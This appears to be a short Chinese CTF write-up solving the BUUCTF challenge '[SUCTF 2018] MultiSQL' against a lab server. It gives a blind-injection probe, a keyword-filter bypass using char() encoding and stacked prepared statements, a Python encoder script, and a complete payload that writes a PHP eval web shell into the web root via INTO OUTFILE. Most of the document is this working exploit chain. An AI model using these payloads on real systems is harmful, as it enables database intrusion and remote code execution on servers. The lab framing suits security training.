BUUCTF：[SUCTF 2018]MultiSQL

BUUCTF：[SUCTF 2018]MultiSQL

两个地方存在漏洞，注册存在二次注入，在登录的时候触发。用户信息?id存在盲注，flag不在数据库当中，需要利用注入getshell
二次注入我没有成功getshell，先看?id，注册一个用户，登入查看信息

?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入，2异或0还是为2


fuzz测试后发现过滤了union，select ，&，|，过滤了select然后存在堆叠注入的可以使用预处理注入，尝试写入shell，因为过滤了select等字符，使用char()绕过，需要执行的语句
select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';
使用脚本编程十进制：

str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
	if i == 0:
		print('char(%s'%ord(str[i]),end="")
	else:
		print(',%s'%ord(str[i]),end="")
print(')')

运行结果

char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

payload：

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

http://71730bda-76d9-4979-ab53-0d0ba83dffdc.node3.buuoj.cn/favicon/shell.php查看shell